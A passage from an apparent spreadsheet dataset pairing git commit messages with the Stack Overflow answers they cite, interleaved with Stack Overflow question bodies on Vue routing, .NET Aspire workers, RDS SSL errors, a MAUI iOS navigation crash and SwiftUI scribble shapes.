        .catch((error) =&amp;gt; {
          console.error('Error fetching dashboard data:', error);
        });
    },
    viewSearchArborists() {
      this.$router.push('/search');
    },
  },
});
&amp;lt;/script&amp;gt;
&amp;lt;style scoped&amp;gt;
.card-header {
  background-color: #f8f9fa;
}
ul {
  list-style: none;
  padding: 0;
}
li {
  margin-bottom: 0.5rem;
}
button {
  display: block;
  margin: 0 auto;
}
&amp;lt;/style&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Finally index.ts&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import { createRouter, createWebHistory } from 'vue-router'
import Home from '../components/pages/Home.vue';
import LoginPage from '../components/pages/LoginPage.vue';
import RegisterPage from '../components/pages/RegisterPage.vue';
import HomeownerDashboard from '../components/pages/HomeownerDashboard.vue';
import SearchArborists from '../components/pages/SearchArborists.vue';
const routes = [
  { path: '/', component: Home }, // Redirect `/` to `/login`
  { path: '/login', component: LoginPage },
  { path: '/register', component: RegisterPage },
  { path: '/homeowner-dashboard', component: HomeownerDashboard, name: 'homeownerDashboard'},
  { path: '/search', component: SearchArborists },
];
const router = createRouter({
  history: createWebHistory(import.meta.env.BASE_URL),
  routes,
});
export default router;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;PS I added the url path for my homeowner profile api endpoint homeowner/profile/. Not sure if this was the correct move or not. I think the API call is working, but there is possibly something in my RegisterPage.vue or HomeownerDashboard.vue that needs to be fixed.&lt;/p&gt;
&lt;p&gt;I really think it would be easier if you viewed my Github profile, that way you can view all of my files. My Github repo link is &lt;a href="https://github.com/remoteconn-7891/FrontendArborfindr" rel="nofollow noreferrer"&gt;https://github.com/remoteconn-7891/FrontendArborfindr&lt;/a&gt;. Please I need help, I know that this is a simple VueJS fix.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/XINPgybc.png" rel="nofollow noreferrer"&gt;enter image description here&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C57</t>
  </si>
  <si>
    <t>Adds user password update related specs
For one to be able to send a request to update a user’s password, one
needs to be logged in to the system. Normally, as part of a user login
the session variable gets set and this currently happens within the
create action of the sessions controller. In RSpec we can’t call other
controller actions as of the details mentioned in this link -
http://stackoverflow.com/questions/7290035/post-to-a-different-controlle
r-in-an-rspec-test, hence we can’t hit sessions#create from within
users controller specs to make a user login. Hence, we’re manually
logging in the user by setting the session and this is what we’ll be
doing when testing all non integration tests.</t>
  </si>
  <si>
    <t>Controller specs are wrappers for Rails functional tests, which don't support multiple requests or controllers. What you want is an RSpec request spec (rails 3) or an integration spec (rails 2). These wrap Rails integration tests, which does support multiple requests with multiple controllers (multiple sessions, even), but they work a bit differently from controller specs. You have to use the full path (so get new_thing_path), and you can't stub anything on the controller (because there is no controller before you make a request).
See
http://relishapp.com/rspec/rspec-rails/docs/request-specs/request-spec
and
http://api.rubyonrails.org/classes/ActionDispatch/IntegrationTest.html
for more info.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to run a worker (as &lt;code&gt;Thread&lt;/code&gt; or &lt;code&gt;BackgroundWorker&lt;/code&gt;) multiple times inside a .NET Aspire AppHost project, which is started from a Blazor Website.&lt;/p&gt;
&lt;p&gt;I have the Projects (AppHost [Aspire], Web [Blazor], Worker [dll]).&lt;/p&gt;
&lt;p&gt;Since I'm new to Aspire I don't know if this is even possible or how to do it.&lt;/p&gt;
&lt;p&gt;I tried using the aspire builder.Services.AddHostedServices(); which did not work due to the namespace not being found because of the using Projects; which is needed for the blazor project as far as I understand.&lt;/p&gt;
&lt;p&gt;I also tried registering it as a project which kinda worked.. well at least it started event if only once and only at the boot without any control over it via the web project.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C570</t>
  </si>
  <si>
    <t>* Creating InlineTextEdit component
* Course Rename ux
Of course this is not done.
This is a placeholder to be wired in once that is figured out.
Strict mode warning in dev from snackbar
https://stackoverflow.com/questions/61220424/material-ui-drawer-finddomnode-is-deprecated-in-strictmode
* Tweaking layout
* remove course name use case specific verbage from InlineTextEdit component</t>
  </si>
  <si>
    <t>According to Material-ui changelog, it should be solve in V5, which is still in alpha.
It seems that at least in some cases this issue cause by createMuiTheme. You can solve this issue by using the experimental (unstable) theme creator
If you want to get the experimental theme creator instead of removing React.StrictMode, you can change it's import from:
import { createMuiTheme } from '@material-ui/core';
To
import { unstable_createMuiStrictModeTheme as createMuiTheme } from '@material-ui/core';
UPDATE
V5 is officially out (and now called MUI). If upgrading is an option for you - it should solve this issue as well.</t>
  </si>
  <si>
    <t xml:space="preserve">We have an internal Flex application which has been designed more through feature creep than by any kind of clear vision. It's basically a kind of CRM and reporting system which utilises quite a lot of Flex components (trees, graphs, custom components, datagrids - all sorts) and talks to a .NET webservice backend.
It was initially my first Flex project and has been written with the bodge, hope and repair kind of style you might expect from a prototype. However, it's now grown to the point where we'll be adding other (neophyte) developers, but it might not be impossible for one person (sigh, probably me) to rewrite the current snapshot in about a month. So, at this stage I'm thinking it might be a good idea to consider a new version implemented in the [external-link] framework.
I don't need advice on which framework to choose, what I would like is advice on how to go about refactoring the project. It seems like this will involve tearing everything down and pretty much starting again (which I'm not totally averse to), but does the framework have to be built in from the ground up? Are there any known and recommended methods of attacking this kind of problem?
</t>
  </si>
  <si>
    <t>C571</t>
  </si>
  <si>
    <t>Add Lego component to separate concerns
add lego component using 'ng g class Lego'
Get Error "Uncaught reflect-metadata shim is required"
Use Stack Overflow solution found here,
https://stackoverflow.com/questions/43333522/angular4-core-es5-js-uncaught-reflect-metadata-shim-is-required-when-using-class
Solve Error by adding import statements to `polyfills.ts`</t>
  </si>
  <si>
    <t>You can workaround this for the time being by adding the following to the top of your polyfills.ts
import 'zone.js';
import 'reflect-metadata';</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to connect existing spring boot application from EC2(RHEL 8) to RDS Postgres database. Both RDS and EC2 are in the same private VPC.&lt;/p&gt;
&lt;p&gt;Connection establishment is working fine from my local spring boot application without SSL to RDS.
From Pgadmin4, i could connect with or with SSL.
No luck from EC2.
getting &amp;quot;org.postgresql.util.PSQLException: SSL error: Received fatal alert: handshake_failure&amp;quot; while starting the application.&lt;/p&gt;
&lt;p&gt;telnet is successful from EC2 to RDS db instance.
Not sure what I am missing, I am stuck.&lt;/p&gt;
&lt;p&gt;I cannot change application code at this point.&lt;/p&gt;
&lt;p&gt;What I have tried:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;In EC2 security group, inbound rules are&lt;/li&gt;
&lt;/ol&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://i.sstatic.net/wj7DqapY.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/wj7DqapY.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;ol start="2"&gt;
&lt;li&gt;In RDS security group, inbo&lt;a href="https://i.sstatic.net/LhbRHc9d.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/LhbRHc9d.png" alt="enter image description here" /&gt;&lt;/a&gt;und rules are,&lt;/li&gt;
&lt;li&gt;I downloaded rds region cerficate and copied in /etc/pki/ca-trust/source/anchors/ and also under JVM location (.........openjdk-8u432-b06-Build/jre/lib/security/cacerts)&lt;/li&gt;
&lt;li&gt;Generated JKS, CRT files from .pem file and copied that under JVM location.&lt;/li&gt;
&lt;li&gt;I have also tried the below configurations from application.properties file.&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code&gt;    server.ssl.keyStore=truststore.jks
    server.ssl.keyStorePassword=changeit
    server.ssl.keyStoreType=JKS
    #With or without the below
    server.ssl.enabled=true
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;    server.ssl.key-store=truststore.jks
    server.ssl.key-store-password=changeit
    server.ssl.key-storetype=JKS
    #With or without the below
    server.ssl.enabled=true  
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C572</t>
  </si>
  <si>
    <t>BugFix: Component Delete Button now Works Properly in EditorModule
The delete button for removing components could fail by trying to remove
the wrong element. This has been fixed by now iterating upwards through
the DOM hierarchy from the button until a `div` is reached.
Furthermore, we now use the delete functionality from
http://stackoverflow.com/a/14887752
which should be more reliable.</t>
  </si>
  <si>
    <t>Seems I don't have enough rep to post a comment, so another answer will have to do.
When you unlink a node using removeChild() or by setting the innerHTML property on the parent, you also need to make sure that there is nothing else referencing it otherwise it won't actually be destroyed and will lead to a memory leak. There are lots of ways in which you could have taken a reference to the node before calling removeChild() and you have to make sure those references that have not gone out of scope are explicitly removed.
Doug Crockford writes here that event handlers are known a cause of circular references in IE and suggests removing them explicitly as follows before calling removeChild()
function purge(d) {
    var a = d.attributes, i, l, n;
    if (a) {
        for (i = a.length - 1; i &gt;= 0; i -= 1) {
            n = a[i].name;
            if (typeof d[n] === 'function') {
                d[n] = null;
            }
        }
    }
    a = d.childNodes;
    if (a) {
        l = a.length;
        for (i = 0; i &lt; l; i += 1) {
            purge(d.childNodes[i]);
        }
    }
}
And even if you take a lot of precautions you can still get memory leaks in IE as described by Jens-Ingo Farley here.
And finally, don't fall into the trap of thinking that Javascript delete is the answer. It seems to be suggested by many, but won't do the job. Here is a great reference on understanding delete by Kangax.</t>
  </si>
  <si>
    <t xml:space="preserve">I am working on an SDK.  The goal of the SDK is to unify access to various hardware products.  As such we have settled on a plugin architecture, using an abstract factory pattern for creation.  The issue I have is that anytime the SDK changes I have to have the project teams recompile their plugins.  Obviously this is necessary if the interfaces they are relying on, or implementing have changed.  My issue is when I fix several bugs (but change no interfaces) they still need to recompile because the plugins are attempting to load a specific version of the SDK (based on the assemblies strong name).
My options as I understand them are:
Don't strongly name my SDK assemblies.  This is not acceptable ultimately as many of our customers require that .Net assemblies be strongly named.
Create a Publisher Policy.  I suspect I will use this eventually, but I am not happy with the idea that two application installed on the same machine cannot use different versions of the SDK.
I understand that what I am looking for would get me DLL hell again, but in this case I feel I need that.  Is there something I am missing?
</t>
  </si>
  <si>
    <t>C573</t>
  </si>
  <si>
    <t>Add checkbox to Item Table
- The technique used to add a checkbox is based on
  the information gathered from the following issue:
  http://stackoverflow.com/questions/37479568/material-ui-tablerow-wrapped-in-component-wont-show-checkbox
- The TableBody component pushes down the props to its
  children and thus must be leveraged from props.</t>
  </si>
  <si>
    <t>I hit the same issue... (using material-ui@0.14.4)
Apparently material-ui TableBody pushes the checkbox component into its children. You need to grab it from your custom TableRow props and render it explicitly in your custom TableRow render() method.
Note: You need to both spread otherProps into the TableRow and explicitly render the checkbox.
// OrderListRow...
render() {
    const { order, ...otherProps } = this.props;
    return(
        &lt;TableRow { ...otherProps }&gt;
            {otherProps.children[0] /* checkbox passed down from Table-Body*/}
            &lt;TableRowColumn&gt;{ order.reference }&lt;/TableRowColumn&gt;
                ... All others columns ...
            &lt;TableRowColumn&gt;
                &lt;RaisedButton label="View" primary={true} linkButton={true} href={ '/order/' + order._id }/&gt;
            &lt;/TableRowColumn&gt;
        &lt;/TableRow&gt;
    );
}
https://github.com/callemall/material-ui/issues/1749#issuecomment-217667754 https://github.com/callemall/material-ui/blob/master/src/Table/TableBody.js#L173</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm developing an Maui iOS app and I got a fully functional app that works with no issue.  The problem I'm having is that there is no back button like there is in Android which allows the user to return to the previous page nor is there a &lt;code&gt;NavigationBar&lt;/code&gt; like what is generated by default in Xamarin.&lt;/p&gt;
&lt;p&gt;As I understand it, the &lt;code&gt;Swipe Back&lt;/code&gt; capability is disabled when one doesn't use a &lt;code&gt;NavigationBar&lt;/code&gt; or &lt;code&gt;NavigationPage&lt;/code&gt;, so I'm trying to add a &lt;code&gt;NavigationBar&lt;/code&gt; or &lt;code&gt;NavigationPage&lt;/code&gt; so the user has that back arrow or button to return to the previous screen.  I have been using the example &lt;a href="https://www.csharp.com/article/working-with-navigationpage-in-net-maui/" rel="nofollow noreferrer"&gt;here&lt;/a&gt; to add the code I need for the bar to appear.  But as soon as I add this code to my App.xaml.cs code files&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;MainPage = new NavigationPage(new Logon());
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;the app immediately crashes when I run it on my test device.  The app breaks on the line '            UIApplication.Main(args, null, typeof(AppDelegate));
' in the program.cs code file in the iOS folder with the error &lt;code&gt;System.NullReferenceException Message=Object reference not set to an instance of an object.&lt;/code&gt;.  That code is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class Program
{
    // This is the main entry point of the application.
    static void Main(string[] args)
    {
        // if you want to use a different Application Delegate class from &amp;quot;AppDelegate&amp;quot;
        // you can specify it here.
        UIApplication.Main(args, null, typeof(AppDelegate));
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've reported the issue to Microsoft &lt;a href="https://developercommunity.visualstudio.com/t/Adding-MainPage--new-NavigationPagene/10852612?port=1025&amp;amp;fsid=1b0f46f9-93dc-4243-b864-be976588c8cb&amp;amp;ref=native&amp;amp;refTime=1740013689160&amp;amp;refUserId=ebd9983e-b3e0-6b4f-9a94-60b4174c2f34" rel="nofollow noreferrer"&gt;here&lt;/a&gt; for those who want to look at all my research thus far.  There were several issues I was running into when I was trying different things, all but this one cleared up after updating my mac and test iPhone to the latest OS.&lt;/p&gt;
&lt;p&gt;**********  EDIT *******************&lt;/p&gt;
&lt;p&gt;This is the &lt;code&gt;Logon&lt;/code&gt; code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public partial class Logon : ContentPage
{
    public Logon()
    {
        InitializeComponent();
    }
    User MyUser = new User();
    CompanyInformation MyCompany = new CompanyInformation();
    bool error = false;
    private async void OnCounterClicked(object sender, EventArgs e)
    {
        string username = TheUsername.Text;
        string password = ThePassword.Text;
        if (username != null)
        {
            if (password != null)
            {
                activityIndicator.IsVisible = true;
#if ANDROID
                await Task.Run(() =&amp;gt; SignOn());
#elif IOS
                iOSSignon();
#endif
            }
            else
            {
                await DisplayAlert(&amp;quot;ERROR&amp;quot;, &amp;quot;Enter your password.&amp;quot;, &amp;quot;OK&amp;quot;);
            }
        }
        else
        {
            await DisplayAlert(&amp;quot;ERROR&amp;quot;, &amp;quot;Enter your username.&amp;quot;, &amp;quot;OK&amp;quot;);
        }
    }
    public void iOSSignon()
    {
        string result = &amp;quot;&amp;quot;;
        MyUser.Username = TheUsername.Text.Trim();
        MyUser.Password = ThePassword.Text.Trim();
        try
        {
            bool isOnline = Utils.IsConnectedToTheInternet();
            if (isOnline)
            {
                MyServiceSoapClient myService = new MyServiceSoapClient(MyServiceSoapClient.EndpointConfiguration.MyServiceSoap);
                try
                {
                    result = myService.Logon(MyUser.Username, MyUser.Password);
                }
                catch (Exception ex)
                {
                    Utils.LogError(&amp;quot;App:MyApp/Logon.xaml.cs/SignOn - An error occured in SignOn function, the error is: &amp;quot; + ex.Message + System.Environment.NewLine + Utils.GetExceptionInfo(ex));
                    DisplayAlert(&amp;quot;ERROR&amp;quot;, &amp;quot;There was an error in the logon process. The error was reported to technical support, please try again later of contact technical support at Support@MyCompany.com.&amp;quot;, &amp;quot;OK&amp;quot;);
                }
            }
            else
            {
                DisplayAlert(&amp;quot;Information&amp;quot;, &amp;quot;There is no internet connection or cell phone connection.  Connect to a wifi network or a cellular network.&amp;quot;, &amp;quot;OK&amp;quot;);
            }
        }
        catch (Exception ex)
        {
            Utils.LogError(&amp;quot;App:MyApp/Logon.xaml.cs - An error occured in the SignOn function, the error is: &amp;quot; + ex.Message + System.Environment.NewLine + Utils.GetExceptionInfo(ex));
            DisplayAlert(&amp;quot;ERROR&amp;quot;, &amp;quot;An error occured in the logon process.  The error was reported to technical support, please try again later or contact technical support at Support@MyCompany.com.&amp;quot;, &amp;quot;OK&amp;quot;);
        }
        if (result == &amp;quot;CONNECTED&amp;quot;)
        {
            Menu MyMenu = new Menu();
            MyMenu.MyUser = MyUser;
            Navigation.PushModalAsync(MyMenu);
        }
        else if (result == &amp;quot;DISABLED&amp;quot;)
        {
            DisplayAlert(&amp;quot;Information&amp;quot;, &amp;quot;Your account has been disabled, contact your supervisor for more information.&amp;quot;, &amp;quot;OK&amp;quot;);
        }
        else
        {
            try
            {
                error = true;
                DisplayAlert(&amp;quot;Information&amp;quot;, &amp;quot;Invalid username or password.&amp;quot;, &amp;quot;OK&amp;quot;);
            }
            catch (Exception ex)
            {
                Utils.LogError(&amp;quot;App:MyApp/Logon.xaml.cs/SignOn() - An error occured in the Logon.xaml.cs SignOn function result = connected, the error is: &amp;quot; + ex.Message + System.Environment.NewLine + Utils.GetExceptionInfo(ex));
                DisplayAlert(&amp;quot;ERROR&amp;quot;, &amp;quot;An error occurred during the logon process.  The error has been reported to technical support, please try again or contact technical support at Support@MyCompany.com&amp;quot;, &amp;quot;OK&amp;quot;);
            }
        }
        ;
        try
        {
            if (error)
            {
                Utils.LogError(&amp;quot;App:MyApp/Logon.xaml.cs/SignOn() (2) - An error occured in the Logon.xaml.cs SignOn function result = connected, the error is: &amp;quot;);
            }
        }
        catch (Exception ex)
        {
            Utils.LogError(&amp;quot;App:MyApp/Logon.xaml.cs/SignOn() (2) - An error occured in Logon.xaml.cs Signin function (second block), the error is: &amp;quot; + ex.Message + System.Environment.NewLine + Utils.GetExceptionInfo(ex));
            DisplayAlert(&amp;quot;ERROR&amp;quot;, &amp;quot;An error occurred during the logon process (2).  The error has been reported to technical support, please try again or contact technical support at Support@MyCompany.com&amp;quot;, &amp;quot;OK&amp;quot;);
        }
    }
    private async Task SignOn()
    {
        string result = &amp;quot;&amp;quot;;
        MyUser.Username = TheUsername.Text.Trim();
        MyUser.Password = ThePassword.Text.Trim();
        try
        {
            bool isOnline = Utils.IsConnectedToTheInternet();
            if (isOnline)
            {
                MyServiceSoapClient myService = new MyServiceSoapClient(MyServiceSoapClient.EndpointConfiguration.MyServiceSoap);
                try
                {
                    result = myService.Logon(MyUser.Username, MyUser.Password);
                }
                catch (Exception ex)
                {
                    Utils.LogError(&amp;quot;App:MyApp/Logon.xaml.cs/SignOn - An error occured in SignOn function, the error is: &amp;quot; + ex.Message + System.Environment.NewLine + Utils.GetExceptionInfo(ex));
                    await DisplayAlert(&amp;quot;ERROR&amp;quot;, &amp;quot;There was an error in the logon process. The error was reported to technical support, please try again later of contact technical support at Support@MyCompany.com.&amp;quot;, &amp;quot;OK&amp;quot;);
                }
            }
            else
            {
                await DisplayAlert(&amp;quot;Information&amp;quot;, &amp;quot;There is no internet connection or cell phone connection.  Connect to a wifi network or cellular network.&amp;quot;, &amp;quot;OK&amp;quot;);
            }
            ;
        }
        catch (Exception ex)
        {
            Utils.LogError(&amp;quot;App:MyApp/Logon.xaml.cs - An error occured in the SignOn function, the error is: &amp;quot; + ex.Message + System.Environment.NewLine + Utils.GetExceptionInfo(ex));
            await DisplayAlert(&amp;quot;ERROR&amp;quot;, &amp;quot;An error occured in the logon process.  The error was reported to technical support, please try again later or contact technical support at Support@MyCompany.com.&amp;quot;, &amp;quot;OK&amp;quot;);
        }
        ;
        if (result == &amp;quot;CONNECTED&amp;quot;)
        {
                Menu MyMenu = new Menu();
                MyMenu.MyUser = MyUser;
                await Navigation.PushModalAsync(MyMenu);
        }
        else if (result == &amp;quot;DISABLED&amp;quot;)
        {
            await DisplayAlert(&amp;quot;Information&amp;quot;, &amp;quot;Your account has been disabled, contact your subervisor for more information.&amp;quot;, &amp;quot;OK&amp;quot;);
        }
        else
        {
            try
            {
                error = true;
                await DisplayAlert(&amp;quot;Information&amp;quot;, &amp;quot;Invalid username or password.&amp;quot;, &amp;quot;OK&amp;quot;);
            }
            catch (Exception ex)
            {
                Utils.LogError(&amp;quot;App:MyApp/Logon.xaml.cs/SignOn() - An error occured in the Logon.xaml.cs SignOn function result = connected, the error is: &amp;quot; + ex.Message + System.Environment.NewLine + Utils.GetExceptionInfo(ex));
                await DisplayAlert(&amp;quot;ERROR&amp;quot;, &amp;quot;An error occurred during the logon process.  The error has been reported to technical support, please try again or contact technical support at Support@MyCompany.com&amp;quot;, &amp;quot;OK&amp;quot;);
            }
        }
        ;
        try
        {
            if (error)
            {
                Utils.LogError(&amp;quot;App:MyApp/Logon.xaml.cs/SignOn() (2) - An error occured in the Logon.xaml.cs SignOn function result = connected, the error is: &amp;quot;);
            }
        }
        catch (Exception ex)
        {
            Utils.LogError(&amp;quot;App:MyApp/Logone.xaml.cs/SignOn() (2) - An error occured in Logon.xaml.cs Signin function (second block), the error is: &amp;quot; + ex.Message + System.Environment.NewLine + Utils.GetExceptionInfo(ex));
            await DisplayAlert(&amp;quot;ERROR&amp;quot;, &amp;quot;An error occurred during the logon process (2).  The error has been reported to technical support, please try again or contact technical support at Support@MyCompany.com&amp;quot;, &amp;quot;OK&amp;quot;);
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is the Logon xaml:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot; ?&amp;gt;
&amp;lt;ContentPage xmlns=&amp;quot;http://schemas.microsoft.com/dotnet/2021/maui&amp;quot;
             xmlns:x=&amp;quot;http://schemas.microsoft.com/winfx/2009/xaml&amp;quot;
             x:Class=&amp;quot;MyApp.Logon&amp;quot;
             x:DataType=&amp;quot;Line&amp;quot;
             Title=&amp;quot;Logon&amp;quot;&amp;gt;
    &amp;lt;ScrollView&amp;gt;
        &amp;lt;VerticalStackLayout
            Padding=&amp;quot;5,0&amp;quot;
            Spacing=&amp;quot;10&amp;quot;&amp;gt;
            &amp;lt;Image
                Source=&amp;quot;banner2.jpg&amp;quot;
                HeightRequest=&amp;quot;75&amp;quot;
                Aspect=&amp;quot;AspectFit&amp;quot;
                SemanticProperties.Description=&amp;quot;My Company&amp;quot; /&amp;gt;
            &amp;lt;Line Stroke=&amp;quot;Black&amp;quot; X2=&amp;quot;{Binding Width, Source={RelativeSource Self}}&amp;quot; HorizontalOptions=&amp;quot;Fill&amp;quot; StrokeThickness=&amp;quot;2&amp;quot; /&amp;gt;
            &amp;lt;ActivityIndicator x:Name=&amp;quot;activityIndicator&amp;quot;
                       IsVisible=&amp;quot;false&amp;quot;
                       IsRunning=&amp;quot;True&amp;quot;
                       VerticalOptions=&amp;quot;Center&amp;quot; HorizontalOptions=&amp;quot;Center&amp;quot;
                       WidthRequest=&amp;quot;100&amp;quot; HeightRequest=&amp;quot;100&amp;quot;/&amp;gt;
            &amp;lt;Label
                Text=&amp;quot;Log On&amp;quot;
                Style=&amp;quot;{StaticResource Headline}&amp;quot;
                SemanticProperties.HeadingLevel=&amp;quot;Level1&amp;quot; /&amp;gt;
            &amp;lt;Label
                Text=&amp;quot;Username&amp;quot;
                Style=&amp;quot;{StaticResource SubHeadline}&amp;quot;
                SemanticProperties.HeadingLevel=&amp;quot;Level2&amp;quot;
                SemanticProperties.Description=&amp;quot;Enter your username.&amp;quot; /&amp;gt;
            &amp;lt;Entry x:Name=&amp;quot;TheUsername&amp;quot;
                Placeholder=&amp;quot;Enter Username&amp;quot;/&amp;gt;
            &amp;lt;Label
                Text=&amp;quot;Password&amp;quot;
                Style=&amp;quot;{StaticResource SubHeadline}&amp;quot;
                SemanticProperties.HeadingLevel=&amp;quot;Level2&amp;quot;
                SemanticProperties.Description=&amp;quot;Enter your password.&amp;quot; /&amp;gt;
            &amp;lt;Entry x:Name=&amp;quot;ThePassword&amp;quot;
                Placeholder=&amp;quot;Enter Password&amp;quot;
                IsPassword=&amp;quot;true&amp;quot; /&amp;gt;
            &amp;lt;Button
                x:Name=&amp;quot;CounterBtn&amp;quot;
                Text=&amp;quot;Submit&amp;quot; 
                SemanticProperties.Hint=&amp;quot;Log on&amp;quot;
                Clicked=&amp;quot;OnCounterClicked&amp;quot;
                HorizontalOptions=&amp;quot;Fill&amp;quot; /&amp;gt;
        &amp;lt;/VerticalStackLayout&amp;gt;
    &amp;lt;/ScrollView&amp;gt;
&amp;lt;/ContentPage&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C574</t>
  </si>
  <si>
    <t>Cleaned up the clock (updating components with state)
  - removed unused var to callset interval
  - looks like you can't move the functions outside the
  ComponentDidMount call, despite what SO sez:
    - https://stackoverflow.com/questions/34875557/creating-custom-function-in-react-component</t>
  </si>
  <si>
    <t>You can create functions in react components. It is actually regular
ES6 class
which inherits from
React.Component
. Just be careful and bind it to the correct context in
onClick
event:
export default class Archive extends React.Component { 
    saySomething(something) {
        console.log(something);
    }
    handleClick(e) {
        this.saySomething("element clicked");
    }
    componentDidMount() {
        this.saySomething("component did mount");
    }
    render() {
        return &lt;button onClick={this.handleClick.bind(this)} value="Click me" /&gt;;
    }
}</t>
  </si>
  <si>
    <t xml:space="preserve">Where in an MVC based architecture should the date formatting (long/short/time/no-time/UK/US) live?  I want to be able to specify long/short/time/no-time on a per-field basis - i.e. DateOfBirth doesn't care about time, but CreationDate might.
Using ASP.NET MVC, there doesn't seem an easy way to do it in the View, which makes me wonder if it should sit in the ViewModel as a FormattedDate field?
Any suggestions? 
</t>
  </si>
  <si>
    <t>C575</t>
  </si>
  <si>
    <t>Add search form
Reference for template-driven forms:
https://angular.io/guide/forms
Reference and example for data excahnge between components:
https://stackoverflow.com/questions/42555259/exchanging-data-between-sibling-components-in-angular-2</t>
  </si>
  <si>
    <t>I created a plknr that should help you. Have a look at
http://plnkr.co/edit/60ncOxHwiOy8biiUc9mt?p=info
As AJT_82 said, you probably forgot to add the
providers: [SharedService]
Update
I updated the plunker in order to use
ngOnInit
to get the subscription and
ngOnDestroy
in order to unsubscribe from it when the component is destroyed.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've written a code to draw a &amp;quot;scribbling&amp;quot; effect with a rectangular shape.&lt;/p&gt;
&lt;p&gt;Ofc shape of scribbling must not be changed on view refresh.&lt;/p&gt;
&lt;p&gt;At least it works â€” and result looks pretty good too!&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/tC5ZxLpy.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/tC5ZxLpy.png" alt="scribbling" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I wonder if it's possible to write a code that can generate &amp;quot;scribbling&amp;quot; with:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Any shape&lt;/li&gt;
&lt;li&gt;Any angle of lines
?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;As example I want to draw shapes:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Circle&lt;/li&gt;
&lt;li&gt;Capsule&lt;/li&gt;
&lt;li&gt;Rounded Rectangle&lt;/li&gt;
&lt;li&gt;Diamond (Rhomboid)&lt;/li&gt;
&lt;li&gt;ect&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I believe there must be a better way than writing separate code for each shape.&lt;/p&gt;
&lt;p&gt;Here is my code to draw a rectangular shape:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
import SwiftUI
struct FillScribbleRect: View {
    var brushSize: CGFloat = 3
    var color: Color = .green
    var type: ScribbleType = .vertical
    var outer = false
    var body: some View {
        ApproximateRect(distance: brushSize * (outer ? 0.6 : 0.5), type: type, outer: outer )
            .stroke(style: StrokeStyle(lineWidth: brushSize, lineCap: .square, lineJoin: .bevel))
            .foregroundColor(color)
    }
}
fileprivate struct ApproximateRect: Shape {
    let distance: Double
    let type: ScribbleType
    let outer: Bool
    func path(in rect: CGRect) -&amp;gt; Path {
        switch type {
        case .vertical:
            return vertical(in: rect)
        case .horizontal:
            return horizontal(in: rect)
        }
    }
}
extension ApproximateRect {
    func distCalc(in rect: CGRect) -&amp;gt; ([UInt], [UInt]) {
        var distToBorder: [UInt] = []
        var distBetweenLines: [UInt] = []
        var rnd = SeededRandom(seed: Int(distance) )
        var count: Int
        switch type {
        case .vertical:
            count = Int(rect.width/distance)
        case .horizontal:
            count = Int(rect.height/distance)
        }
        for _ in 1...count {
            distToBorder.append( rnd.next(upperBound: UInt(8) ) )
            distBetweenLines.append( rnd.next(upperBound: UInt(distance) ) )
        }
        return (distToBorder, distBetweenLines)
    }
    func vertical(in rect: CGRect) -&amp;gt; Path {
        let (distToBorder, distBetweenLines) = distCalc(in: rect)
        var path = Path()
        //top line
        path.move(to: CGPoint(x: rect.minX, y: rect.minY) )
        var flag = true
        for i in distToBorder.indices {
            if flag {
                let t = (outer ? 1 : -1 ) * Double(distToBorder[i])
                path.addQuadCurve(
                    to: CGPoint(x: rect.minX + distance * Double(i+2) - Double(distBetweenLines[i]), y: rect.height + t ),
                    control: CGPoint(x: distance * Double(i), y: rect.height/2)
                )
            } else {
                let t = (outer ? -1 : 1 ) * Double(distToBorder[i])
                path.addQuadCurve(
                    to: CGPoint(x: rect.minX + distance * Double(i+2) - Double(distBetweenLines[i]), y: rect.minY + t ),
                    control: CGPoint(x: distance * Double(i), y: rect.height/2 )
                )
            }
            flag.toggle()
        }
        return path
    }
    func horizontal(in rect: CGRect) -&amp;gt; Path {
        let (distToBorder, distBetweenLines) = distCalc(in: rect)
        var path = Path()
        //top line
        path.move(to: CGPoint(x: rect.minX, y: rect.minY) )
        var flag = true
        for i in distToBorder.indices {
            if flag {
                let t = (outer ? 1 : -1 ) * Double(distToBorder[i])
                path.addQuadCurve(
                    to: CGPoint(x: rect.width + t, y: rect.minY + distance * Double(i+2) - Double(distBetweenLines[i]) ),
                    control: CGPoint(x: rect.width/2, y: distance * Double(i))
                )
            } else {
                let t = (outer ? -1 : 1 ) * Double(distToBorder[i])
                path.addQuadCurve(
